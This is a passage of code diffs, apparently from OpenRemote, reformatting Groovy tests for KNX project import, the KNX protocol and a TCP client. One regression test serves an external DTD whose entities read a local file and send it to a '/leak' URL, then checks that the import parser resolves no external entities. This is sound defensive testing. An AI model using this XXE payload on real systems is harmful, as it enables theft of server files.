--- a/test/src/test/groovy/org/openremote/test/protocol/KNXImportTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/KNXImportTest.groovy
@@ -43,83 +43,84 @@ import static org.openremote.model.Constants.*
 @Ignore
 class KNXImportTest extends Specification implements ManagerContainerTrait {
 
-    def "Check KNX protocol import"() {
+  def "Check KNX protocol import"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
 
-        when: "a KNX agent is created. to test the import functionality"
-        def knxAgent = new KNXAgent("KNX agent")
-        knxAgent.setRealm(MASTER_REALM)
-        knxAgent = assetStorageService.merge(knxAgent)
+    when: "a KNX agent is created. to test the import functionality"
+    def knxAgent = new KNXAgent("KNX agent")
+    knxAgent.setRealm(MASTER_REALM)
+    knxAgent = assetStorageService.merge(knxAgent)
 
-        then: "the protocol instance should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(knxAgent.getId()) != null
-        }
+    then: "the protocol instance should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(knxAgent.getId()) != null
+    }
 
-        when: "an authenticated admin user"
-        def accessToken = authenticate(
+    when: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        then: "the container should settle down and the agent should be deployed"
-        conditions.eventually {
-            assert agentService.getAgents().containsKey(knxAgent.id)
-            assert noEventProcessedIn(assetProcessingService, 500)
-        }
-
-        when: "discovery is requested with a ETS project file"
-        def knxProjectFileResource = getClass().getResourceAsStream(
-            "/org/openremote/test/protocol/knx/knx-import-testproject.knxproj"
-        )
-        String base64Content = Base64.getEncoder().encodeToString(knxProjectFileResource.bytes)
-        def fileInfo = new FileInfo("knx-import-testproject.knxproj", base64Content, true)
-        def assets = agentResource.doProtocolAssetImport(null, knxAgent.getId(), null, fileInfo)
-
-        then: "the new things and attributes should be created"
-        conditions.eventually {
-            assert assets != null
-            assert assets.length == 12
-            assert assets.each {
-                !TextUtil.isNullOrEmpty(it.asset.id) &&
-                    !TextUtil.isNullOrEmpty(it.asset.getName()) &&
-                    !it.asset.attributes().isEmpty() &&
-                    it.asset.getAttributes().stream().allMatch({attr ->
-                        attr.getMetaValue(AGENT_LINK).map({agentLink -> agentLink.id == knxAgent.id})
-                            .orElse(false)
-                    })
-
-            }
-        }
-
-        and: "a given asset should have the correct attributes (Target Temperature)"
-        def asset = assets.find {it.asset.name == "Target Temperature"}
-        assert asset != null
-        assert asset.asset.getAttributes().size() == 1
-        def attribute = asset.asset.getAttribute("TargetTemperature").get()
-        assert attribute != null
-        def metaItem = attribute.getMetaItem(KNXProtocol.META_KNX_STATUS_GA).get()
-        assert metaItem != null
-        assert metaItem.getValue().get() == "5/0/4"
-        def metaItem2 = attribute.getMetaItem(KNXProtocol.META_KNX_ACTION_GA).get()
-        metaItem2 != null
-        metaItem2.getValue().get() == "5/0/0"
-        def metaItem3 = attribute.getMetaItem(KNXProtocol.META_KNX_DPT).get()
-        metaItem3 != null
-        metaItem3.getValue().get() == "9.001"
+    then: "the container should settle down and the agent should be deployed"
+    conditions.eventually {
+      assert agentService.getAgents().containsKey(knxAgent.id)
+      assert noEventProcessedIn(assetProcessingService, 500)
     }
+
+    when: "discovery is requested with a ETS project file"
+    def knxProjectFileResource = getClass().getResourceAsStream(
+            "/org/openremote/test/protocol/knx/knx-import-testproject.knxproj"
+            )
+    String base64Content = Base64.getEncoder().encodeToString(knxProjectFileResource.bytes)
+    def fileInfo = new FileInfo("knx-import-testproject.knxproj", base64Content, true)
+    def assets = agentResource.doProtocolAssetImport(null, knxAgent.getId(), null, fileInfo)
+
+    then: "the new things and attributes should be created"
+    conditions.eventually {
+      assert assets != null
+      assert assets.length == 12
+      assert assets.each {
+        !TextUtil.isNullOrEmpty(it.asset.id) &&
+        !TextUtil.isNullOrEmpty(it.asset.getName()) &&
+        !it.asset.attributes().isEmpty() &&
+        it.asset.getAttributes().stream().allMatch({attr ->
+          attr.getMetaValue(AGENT_LINK).map({agentLink ->
+            agentLink.id == knxAgent.id
+          })
+          .orElse(false)
+        })
+      }
+    }
+
+    and: "a given asset should have the correct attributes (Target Temperature)"
+    def asset = assets.find {it.asset.name == "Target Temperature"}
+    assert asset != null
+    assert asset.asset.getAttributes().size() == 1
+    def attribute = asset.asset.getAttribute("TargetTemperature").get()
+    assert attribute != null
+    def metaItem = attribute.getMetaItem(KNXProtocol.META_KNX_STATUS_GA).get()
+    assert metaItem != null
+    assert metaItem.getValue().get() == "5/0/4"
+    def metaItem2 = attribute.getMetaItem(KNXProtocol.META_KNX_ACTION_GA).get()
+    metaItem2 != null
+    metaItem2.getValue().get() == "5/0/0"
+    def metaItem3 = attribute.getMetaItem(KNXProtocol.META_KNX_DPT).get()
+    metaItem3 != null
+    metaItem3.getValue().get() == "9.001"
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/KNXImportXXETest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/KNXImportXXETest.groovy
@@ -35,60 +35,60 @@ import java.util.zip.ZipOutputStream
 
 class KNXImportXXETest extends Specification {
 
-    def "KNX asset import still processes valid ETS project files"() {
-        given: "a KNX protocol instance with only the import executor initialised"
-        ValueUtil.initialise(null)
-        def executor = Executors.newSingleThreadExecutor()
-        def protocol = new TestKNXProtocol(new KNXAgent("KNX").setId("knx-agent"), executor)
-        def projectFile = getClass().getResourceAsStream("/org/openremote/test/protocol/knx/knx-import-testproject.knxproj").bytes
-        def assets = Collections.synchronizedList([])
+  def "KNX asset import still processes valid ETS project files"() {
+    given: "a KNX protocol instance with only the import executor initialised"
+    ValueUtil.initialise(null)
+    def executor = Executors.newSingleThreadExecutor()
+    def protocol = new TestKNXProtocol(new KNXAgent("KNX").setId("knx-agent"), executor)
+    def projectFile = getClass().getResourceAsStream("/org/openremote/test/protocol/knx/knx-import-testproject.knxproj").bytes
+    def assets = Collections.synchronizedList([])
 
-        when: "a valid ETS project file is imported"
-        protocol.startAssetImport(projectFile, { AssetTreeNode[] discovered ->
-            assets.addAll(discovered as List)
-        } as Consumer<AssetTreeNode[]>).get(10, TimeUnit.SECONDS)
+    when: "a valid ETS project file is imported"
+    protocol.startAssetImport(projectFile, { AssetTreeNode[] discovered ->
+      assets.addAll(discovered as List)
+    } as Consumer<AssetTreeNode[]>).get(10, TimeUnit.SECONDS)
 
-        then: "the expected assets are discovered"
-        assets.size() == 12
-        assets.every {
-            it.asset.name != null &&
-                !it.asset.attributes.isEmpty()
-        }
-
-        cleanup:
-        executor?.shutdownNow()
+    then: "the expected assets are discovered"
+    assets.size() == 12
+    assets.every {
+      it.asset.name != null &&
+      !it.asset.attributes.isEmpty()
     }
 
-    def "KNX asset import must not resolve external entities from uploaded ETS XML"() {
-        given: "a local endpoint serving an attacker controlled external DTD"
-        def leakedContent = "knx-xxe-${UUID.randomUUID()}"
-        def secretFile = File.createTempFile("knx-xxe-", ".txt")
-        secretFile.text = leakedContent
-        def requestedUris = Collections.synchronizedList([])
-        def server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0)
-        def port = server.address.port
-        server.createContext("/") { exchange ->
-            def uri = exchange.requestURI.toString()
-            requestedUris.add(uri)
-            byte[] body
-            if (uri.startsWith("/evil.dtd")) {
-                body = """<!ENTITY % file SYSTEM "${secretFile.toURI()}">
+    cleanup:
+    executor?.shutdownNow()
+  }
+
+  def "KNX asset import must not resolve external entities from uploaded ETS XML"() {
+    given: "a local endpoint serving an attacker controlled external DTD"
+    def leakedContent = "knx-xxe-${UUID.randomUUID()}"
+    def secretFile = File.createTempFile("knx-xxe-", ".txt")
+    secretFile.text = leakedContent
+    def requestedUris = Collections.synchronizedList([])
+    def server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0)
+    def port = server.address.port
+    server.createContext("/") { exchange ->
+      def uri = exchange.requestURI.toString()
+      requestedUris.add(uri)
+      byte[] body
+      if (uri.startsWith("/evil.dtd")) {
+        body = """<!ENTITY % file SYSTEM "${secretFile.toURI()}">
 <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:${port}/leak?x=%file;'>">
 %eval;
 %exfil;
 """.getBytes(StandardCharsets.UTF_8)
-            } else {
-                body = "ok".getBytes(StandardCharsets.UTF_8)
-            }
-            exchange.sendResponseHeaders(200, body.length)
-            exchange.responseBody.withCloseable {
-                it.write(body)
-            }
-        }
-        server.start()
+      } else {
+        body = "ok".getBytes(StandardCharsets.UTF_8)
+      }
+      exchange.sendResponseHeaders(200, body.length)
+      exchange.responseBody.withCloseable {
+        it.write(body)
+      }
+    }
+    server.start()
 
-        and: "a KNX ETS project archive whose 0.xml references the external DTD"
-        def projectFile = etsProjectWith0Xml("""<?xml version="1.0"?>
+    and: "a KNX ETS project archive whose 0.xml references the external DTD"
+    def projectFile = etsProjectWith0Xml("""<?xml version="1.0"?>
 <!DOCTYPE b:KNX SYSTEM "http://127.0.0.1:${port}/evil.dtd">
 <b:KNX xmlns:b="http://knx.org/xml/project/13">
   <b:Project>
@@ -101,37 +101,37 @@ class KNXImportXXETest extends Specification {
 </b:KNX>
 """)
 
-        and: "a KNX protocol instance with only the import executor initialised"
-        ValueUtil.initialise(null)
-        def executor = Executors.newSingleThreadExecutor()
-        def protocol = new TestKNXProtocol(new KNXAgent("KNX").setId("knx-agent"), executor)
+    and: "a KNX protocol instance with only the import executor initialised"
+    ValueUtil.initialise(null)
+    def executor = Executors.newSingleThreadExecutor()
+    def protocol = new TestKNXProtocol(new KNXAgent("KNX").setId("knx-agent"), executor)
 
-        when: "the uploaded ETS XML is imported"
-        protocol.startAssetImport(projectFile, { AssetTreeNode[] ignored -> } as Consumer<AssetTreeNode[]>).get(10, TimeUnit.SECONDS)
+    when: "the uploaded ETS XML is imported"
+    protocol.startAssetImport(projectFile, { AssetTreeNode[] ignored -> } as Consumer<AssetTreeNode[]>).get(10, TimeUnit.SECONDS)
 
-        then: "the parser does not make an out-of-band request containing local file contents"
-        requestedUris.isEmpty()
+    then: "the parser does not make an out-of-band request containing local file contents"
+    requestedUris.isEmpty()
 
-        cleanup:
-        server?.stop(0)
-        executor?.shutdownNow()
-        secretFile?.delete()
+    cleanup:
+    server?.stop(0)
+    executor?.shutdownNow()
+    secretFile?.delete()
+  }
+
+  private static byte[] etsProjectWith0Xml(String xml) {
+    def out = new ByteArrayOutputStream()
+    new ZipOutputStream(out).withCloseable { zip ->
+      zip.putNextEntry(new ZipEntry("P-0001/0.xml"))
+      zip.write(xml.getBytes(StandardCharsets.UTF_8))
+      zip.closeEntry()
     }
+    return out.toByteArray()
+  }
 
-    private static byte[] etsProjectWith0Xml(String xml) {
-        def out = new ByteArrayOutputStream()
-        new ZipOutputStream(out).withCloseable { zip ->
-            zip.putNextEntry(new ZipEntry("P-0001/0.xml"))
-            zip.write(xml.getBytes(StandardCharsets.UTF_8))
-            zip.closeEntry()
-        }
-        return out.toByteArray()
+  private static class TestKNXProtocol extends KNXProtocol {
+    TestKNXProtocol(KNXAgent agent, ExecutorService executorService) {
+      super(agent)
+      this.executorService = executorService
     }
-
-    private static class TestKNXProtocol extends KNXProtocol {
-        TestKNXProtocol(KNXAgent agent, ExecutorService executorService) {
-            super(agent)
-            this.executorService = executorService
-        }
-    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/KNXProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/KNXProtocolTest.groovy
@@ -96,8 +96,11 @@ class KNXProtocolTest extends Specification implements ManagerContainerTrait {
         // inet 127.51.68.120 netmask 0xff000000
         // nd6 options=201<PERFORMNUD,DAD>
         // Use the same code as Calimero uses to find the address to listen on
-        def loopbackIP = ni.inetAddresses().filter(Inet4Address.class::isInstance).findFirst()
-                .map((ia) -> ia.getHostAddress()).orElse("127.0.0.1")
+        def loopbackIP = ni.inetAddresses()
+            .filter { it instanceof Inet4Address }
+            .findFirst()
+            .map { it.hostAddress }
+            .orElse("127.0.0.1")
         def knxAgent1 = new KNXAgent("KNX Agent 1")
             .setHost(loopbackIP)
             .setBindHost(loopbackIP)

--- a/test/src/test/groovy/org/openremote/test/protocol/KNXProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/KNXProtocolTest.groovy
@@ -48,129 +48,129 @@ import static org.openremote.model.value.ValueType.BOOLEAN
  */
 class KNXProtocolTest extends Specification implements ManagerContainerTrait {
 
-    def "Check KNX protocol"() {
+  def "Check KNX protocol"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the KNX emulation server is started"
-        def configFile = "/org/openremote/test/protocol/knx/knx-server-config.xml"
-        def configUri = getClass().getResource(configFile).toURI()
-        // Calimero server uses NetworkInterface.getByName for interface lookup which is un-reliable so we find it at runtime
-        def configStr = getClass().getResource(configFile).text
-        def ni = NetworkInterface.getByInetAddress(InetAddress.getLoopbackAddress())
-        configStr = configStr.replaceAll("LOOPBACK_ADDRESS", ni.getName())
-        def file = Path.of(configUri).toFile()
-        if (file.exists()) {
-            def w = file.newWriter()
-            file.newWriter().withWriter {
-                it << configStr
-            }
-        }
-        def knxEmulationServer = new Launcher(configUri.toString())
-        def knxServerThread = new Thread(knxEmulationServer)
-        knxServerThread.start()
-        KNXTestingNetworkLink knxTestingNetwork
+    and: "the KNX emulation server is started"
+    def configFile = "/org/openremote/test/protocol/knx/knx-server-config.xml"
+    def configUri = getClass().getResource(configFile).toURI()
+    // Calimero server uses NetworkInterface.getByName for interface lookup which is un-reliable so we find it at runtime
+    def configStr = getClass().getResource(configFile).text
+    def ni = NetworkInterface.getByInetAddress(InetAddress.getLoopbackAddress())
+    configStr = configStr.replaceAll("LOOPBACK_ADDRESS", ni.getName())
+    def file = Path.of(configUri).toFile()
+    if (file.exists()) {
+      def w = file.newWriter()
+      file.newWriter().withWriter {
+        it << configStr
+      }
+    }
+    def knxEmulationServer = new Launcher(configUri.toString())
+    def knxServerThread = new Thread(knxEmulationServer)
+    knxServerThread.start()
+    KNXTestingNetworkLink knxTestingNetwork
 
-        expect: "the testing network to become available"
-        conditions.eventually {
-            knxTestingNetwork = KNXTestingNetworkLink.getInstance()
-            assert knxTestingNetwork != null
-        }
+    expect: "the testing network to become available"
+    conditions.eventually {
+      knxTestingNetwork = KNXTestingNetworkLink.getInstance()
+      assert knxTestingNetwork != null
+    }
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
 
 
-        when: "KNX agents are created"
+    when: "KNX agents are created"
 
-        // Some machines have multiple IPs associated with the loopback interface e.g.
-        // lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
-        // options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
-        //         inet 127.0.0.1 netmask 0xff000000
-        // inet6 ::1 prefixlen 128
-        // inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
-        // inet 127.51.68.120 netmask 0xff000000
-        // nd6 options=201<PERFORMNUD,DAD>
-        // Use the same code as Calimero uses to find the address to listen on
-        def loopbackIP = ni.inetAddresses()
+    // Some machines have multiple IPs associated with the loopback interface e.g.
+    // lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
+    // options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
+    //         inet 127.0.0.1 netmask 0xff000000
+    // inet6 ::1 prefixlen 128
+    // inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
+    // inet 127.51.68.120 netmask 0xff000000
+    // nd6 options=201<PERFORMNUD,DAD>
+    // Use the same code as Calimero uses to find the address to listen on
+    def loopbackIP = ni.inetAddresses()
             .filter { it instanceof Inet4Address }
             .findFirst()
             .map { it.hostAddress }
             .orElse("127.0.0.1")
-        def knxAgent1 = new KNXAgent("KNX Agent 1")
+    def knxAgent1 = new KNXAgent("KNX Agent 1")
             .setHost(loopbackIP)
             .setBindHost(loopbackIP)
             .setRealm(Constants.MASTER_REALM)
-        def knxAgent2 = new KNXAgent("KNX Agent 2")
+    def knxAgent2 = new KNXAgent("KNX Agent 2")
             .setRealm(Constants.MASTER_REALM)
 
-        knxAgent1 = assetStorageService.merge(knxAgent1)
-        knxAgent2 = assetStorageService.merge(knxAgent2)
+    knxAgent1 = assetStorageService.merge(knxAgent1)
+    knxAgent2 = assetStorageService.merge(knxAgent2)
 
-        then: "a protocol instance should be created for the valid agent but not the invalid one"
-        conditions.eventually {
-            assert agentService.getAgent(knxAgent1.id) != null
-            assert agentService.getAgent(knxAgent2.id) != null
-            assert agentService.getAgent(knxAgent1.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            assert agentService.getAgent(knxAgent2.id).getAgentStatus().orElse(null) == ConnectionStatus.ERROR
-            assert agentService.getProtocolInstance(knxAgent1.id) != null
-            assert agentService.getProtocolInstance(knxAgent2.id) == null
-        }
+    then: "a protocol instance should be created for the valid agent but not the invalid one"
+    conditions.eventually {
+      assert agentService.getAgent(knxAgent1.id) != null
+      assert agentService.getAgent(knxAgent2.id) != null
+      assert agentService.getAgent(knxAgent1.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      assert agentService.getAgent(knxAgent2.id).getAgentStatus().orElse(null) == ConnectionStatus.ERROR
+      assert agentService.getProtocolInstance(knxAgent1.id) != null
+      assert agentService.getProtocolInstance(knxAgent2.id) == null
+    }
 
-        when: "a thing asset is created that links it's attributes to the valid knx agent"
-        def knxThing = new ThingAsset("Living Room Asset")
+    when: "a thing asset is created that links it's attributes to the valid knx agent"
+    def knxThing = new ThingAsset("Living Room Asset")
             .setParent(knxAgent1)
             .addOrReplaceAttributes(
-                new Attribute<>("light1ToggleOnOff", BOOLEAN)
-                    .addOrReplaceMeta(
-                        new MetaItem<>(LABEL, "Light 1 Toggle On/Off"),
-                        new MetaItem<>(AGENT_LINK, new KNXAgentLink(knxAgent1.id, "1.001", "1/0/17", "0/4/14"))
+            new Attribute<>("light1ToggleOnOff", BOOLEAN)
+            .addOrReplaceMeta(
+                    new MetaItem<>(LABEL, "Light 1 Toggle On/Off"),
+                    new MetaItem<>(AGENT_LINK, new KNXAgentLink(knxAgent1.id, "1.001", "1/0/17", "0/4/14"))
                     )
-        )
-        knxThing = assetStorageService.merge(knxThing)
+            )
+    knxThing = assetStorageService.merge(knxThing)
 
-        then: "the living room thing to be fully deployed"
-        conditions.eventually {
-            assert ((KNXProtocol) agentService.getProtocolInstance(knxAgent1.id)).attributeStatusMap.get(new AttributeRef(knxThing.id, "light1ToggleOnOff")) != null
-        }
-
-        when: "change light1ToggleOnOff value to 'true'"
-        def switchChange = new AttributeEvent(knxThing.getId(), "light1ToggleOnOff", true)
-        assetProcessingService.sendAttributeEvent(switchChange)
-
-        then: "the correct data should arrive on KNX bus"
-        conditions.eventually {
-           assert knxTestingNetwork.getLastDataReceived() == "0081"
-        }
-
-        when: "change light1ToggleOnOff value to 'false'"
-        switchChange = new AttributeEvent(knxThing.getId(), "light1ToggleOnOff", false)
-        assetProcessingService.sendAttributeEvent(switchChange)
-
-        then: "the correct data should arrive on KNX bus"
-        conditions.eventually {
-            assert knxTestingNetwork.getLastDataReceived() == "0080"
-        }
-
-        cleanup: "the server should be stopped"
-        if (knxThing != null) {
-            assetStorageService.delete([knxThing.id])
-        }
-        if (knxAgent1 != null) {
-            assetStorageService.delete([knxAgent1.id])
-        }
-        if (knxAgent2 != null) {
-            assetStorageService.delete([knxAgent2.id])
-        }
-        if (knxEmulationServer != null) {
-            knxEmulationServer.quit()
-        }
-        if (knxTestingNetwork != null) {
-            knxTestingNetwork.close()
-        }
+    then: "the living room thing to be fully deployed"
+    conditions.eventually {
+      assert ((KNXProtocol) agentService.getProtocolInstance(knxAgent1.id)).attributeStatusMap.get(new AttributeRef(knxThing.id, "light1ToggleOnOff")) != null
     }
+
+    when: "change light1ToggleOnOff value to 'true'"
+    def switchChange = new AttributeEvent(knxThing.getId(), "light1ToggleOnOff", true)
+    assetProcessingService.sendAttributeEvent(switchChange)
+
+    then: "the correct data should arrive on KNX bus"
+    conditions.eventually {
+      assert knxTestingNetwork.getLastDataReceived() == "0081"
+    }
+
+    when: "change light1ToggleOnOff value to 'false'"
+    switchChange = new AttributeEvent(knxThing.getId(), "light1ToggleOnOff", false)
+    assetProcessingService.sendAttributeEvent(switchChange)
+
+    then: "the correct data should arrive on KNX bus"
+    conditions.eventually {
+      assert knxTestingNetwork.getLastDataReceived() == "0080"
+    }
+
+    cleanup: "the server should be stopped"
+    if (knxThing != null) {
+      assetStorageService.delete([knxThing.id])
+    }
+    if (knxAgent1 != null) {
+      assetStorageService.delete([knxAgent1.id])
+    }
+    if (knxAgent2 != null) {
+      assetStorageService.delete([knxAgent2.id])
+    }
+    if (knxEmulationServer != null) {
+      knxEmulationServer.quit()
+    }
+    if (knxTestingNetwork != null) {
+      knxTestingNetwork.close()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/TcpClientTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/TcpClientTest.groovy
@@ -36,174 +36,176 @@ import spock.util.concurrent.PollingConditions
  */
 class TcpClientTest extends Specification implements ManagerContainerTrait {
 
-    def "Check client"() {
+  def "Check client"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 60, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 60, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), [new TimerService()])
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), [new TimerService()])
 
-        and: "a simple TCP echo server"
-        def echoServerPort = findEphemeralPort()
-        def echoServer = new TCPStringServer(new InetSocketAddress("127.0.0.1", echoServerPort), ";", Integer.MAX_VALUE, true)
-        echoServer.addMessageConsumer({
-            message, channel, sender -> echoServer.sendMessage(message)
-        })
+    and: "a simple TCP echo server"
+    def echoServerPort = findEphemeralPort()
+    def echoServer = new TCPStringServer(new InetSocketAddress("127.0.0.1", echoServerPort), ";", Integer.MAX_VALUE, true)
+    echoServer.addMessageConsumer({ message, channel, sender ->
+      echoServer.sendMessage(message)
+    })
 
-        and: "a simple TCP client"
-        TestTCPClient client = new TestTCPClient(
-                "127.0.0.1",
-                echoServerPort)
-        client.setEncoderDecoderProvider({
-            [new StringEncoder(CharsetUtil.UTF_8),
-            new StringDecoder(CharsetUtil.UTF_8),
-            new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)].toArray(new ChannelHandler[0])
-        })
+    and: "a simple TCP client"
+    TestTCPClient client = new TestTCPClient(
+            "127.0.0.1",
+            echoServerPort)
+    client.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
+      ].toArray(new ChannelHandler[0])
+    })
 
-        and: "we add callback consumers to the client"
-        def connectionStatuses = [client.getConnectionStatus()]
-        String lastMessage
-        client.addMessageConsumer({
-            message -> lastMessage = message
-        })
-        client.addConnectionStatusConsumer({
-            status -> connectionStatuses.add(status)
-        })
+    and: "we add callback consumers to the client"
+    def connectionStatuses = [client.getConnectionStatus()]
+    String lastMessage
+    client.addMessageConsumer({ message ->
+      lastMessage = message
+    })
+    client.addConnectionStatusConsumer({ status ->
+      connectionStatuses.add(status)
+    })
 
-        when: "the server is started"
-        echoServer.start()
+    when: "the server is started"
+    echoServer.start()
 
-        then: "the server should be running"
-        conditions.eventually {
-            assert echoServer.channelFuture.isDone()
-            assert echoServer.channelFuture.isSuccess()
-        }
-
-        when: "we call connect on the client"
-        client.connect()
-
-        then: "the client status should become CONNECTED"
-        conditions.eventually {
-//            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatuses.last() == ConnectionStatus.CONNECTED
-            assert echoServer.allChannels.size() == 1
-        }
-
-        when: "the server sends a message"
-        echoServer.sendMessage("Hello world")
-
-        then: "we should receive the message"
-        conditions.eventually {
-            assert lastMessage == "Hello world"
-        }
-
-        when: "we send a message to the server"
-        client.sendMessage("Test;")
-
-        then: "we should get the same message back"
-        conditions.eventually {
-            assert lastMessage == "Test"
-        }
-
-        when: "we request the client to disconnect"
-        client.disconnect()
-
-        then: "the client should become DISCONNECTED"
-        conditions.eventually {
-//            assert client.connectionStatus == ConnectionStatus.DISCONNECTED
-            assert connectionStatuses.last() == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "we reconnect the same client"
-        client.connect()
-
-        then: "the client status should become CONNECTED"
-        conditions.eventually {
-//            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatuses.last() == ConnectionStatus.CONNECTED
-            assert echoServer.allChannels.size() == 1
-        }
-
-        when: "the server sends a message"
-        echoServer.sendMessage("Is there anyone there?")
-
-        then: "we should receive the message"
-        conditions.eventually {
-            assert lastMessage == "Is there anyone there?"
-        }
-
-        when: "we send a message to the server"
-        client.sendMessage("Yes there is!;")
-
-        then: "we should get the same message back"
-        conditions.eventually {
-            assert lastMessage == "Yes there is!"
-        }
-
-        when: "we lose connection to the server"
-        connectionStatuses.clear()
-        client.connectAttempts = 0
-        echoServer.stop()
-
-        then: "the server status should be DISCONNECTED"
-        conditions.eventually {
-            assert echoServer.connectionStatus == ConnectionStatus.DISCONNECTED
-        }
-
-        then: "the client status should change to CONNECTING and several re-connection attempts should be made"
-        conditions.eventually {
-//            assert client.connectionStatus == ConnectionStatus.CONNECTING
-            assert connectionStatuses.contains(ConnectionStatus.CONNECTING)
-            assert client.connectAttempts > 2
-        }
-
-        when: "the connection to the server is restored"
-        // need to retry here as the previous connected socket might not have been released
-        def retries = 0
-        while (echoServer.connectionStatus != ConnectionStatus.CONNECTED && retries < 10) {
-            echoServer.start()
-            Thread.sleep(500)
-            retries++
-        }
-
-        then: "the server is connected"
-        assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
-
-        then: "the client status should become CONNECTED"
-        conditions.eventually {
-//            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatuses.last() == ConnectionStatus.CONNECTED
-            assert echoServer.allChannels.size() == 1
-        }
-
-        when: "the server sends a message"
-        echoServer.sendMessage("Is there anyone there?")
-
-        then: "we should receive the message"
-        conditions.eventually {
-            assert lastMessage == "Is there anyone there?"
-        }
-
-        when: "we send a message to the server"
-        client.sendMessage("Yes there is!;")
-
-        then: "we should get the same message back"
-        conditions.eventually {
-            assert lastMessage == "Yes there is!"
-        }
-
-        when: "we request the processor to disconnect"
-        client.disconnect()
-
-        then: "the client should become DISCONNECTED"
-        conditions.eventually {
-//            assert client.connectionStatus == ConnectionStatus.DISCONNECTED
-            assert connectionStatuses.last() == ConnectionStatus.DISCONNECTED
-        }
-
-        cleanup: "the server should be stopped"
-        client.disconnect()
-        echoServer.stop()
+    then: "the server should be running"
+    conditions.eventually {
+      assert echoServer.channelFuture.isDone()
+      assert echoServer.channelFuture.isSuccess()
     }
+
+    when: "we call connect on the client"
+    client.connect()
+
+    then: "the client status should become CONNECTED"
+    conditions.eventually {
+      //            assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatuses.last() == ConnectionStatus.CONNECTED
+      assert echoServer.allChannels.size() == 1
+    }
+
+    when: "the server sends a message"
+    echoServer.sendMessage("Hello world")
+
+    then: "we should receive the message"
+    conditions.eventually {
+      assert lastMessage == "Hello world"
+    }
+
+    when: "we send a message to the server"
+    client.sendMessage("Test;")
+
+    then: "we should get the same message back"
+    conditions.eventually {
+      assert lastMessage == "Test"
+    }
+
+    when: "we request the client to disconnect"
+    client.disconnect()
+
+    then: "the client should become DISCONNECTED"
+    conditions.eventually {
+      //            assert client.connectionStatus == ConnectionStatus.DISCONNECTED
+      assert connectionStatuses.last() == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "we reconnect the same client"
+    client.connect()
+
+    then: "the client status should become CONNECTED"
+    conditions.eventually {
+      //            assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatuses.last() == ConnectionStatus.CONNECTED
+      assert echoServer.allChannels.size() == 1
+    }
+
+    when: "the server sends a message"
+    echoServer.sendMessage("Is there anyone there?")
+
+    then: "we should receive the message"
+    conditions.eventually {
+      assert lastMessage == "Is there anyone there?"
+    }
+
+    when: "we send a message to the server"
+    client.sendMessage("Yes there is!;")
+
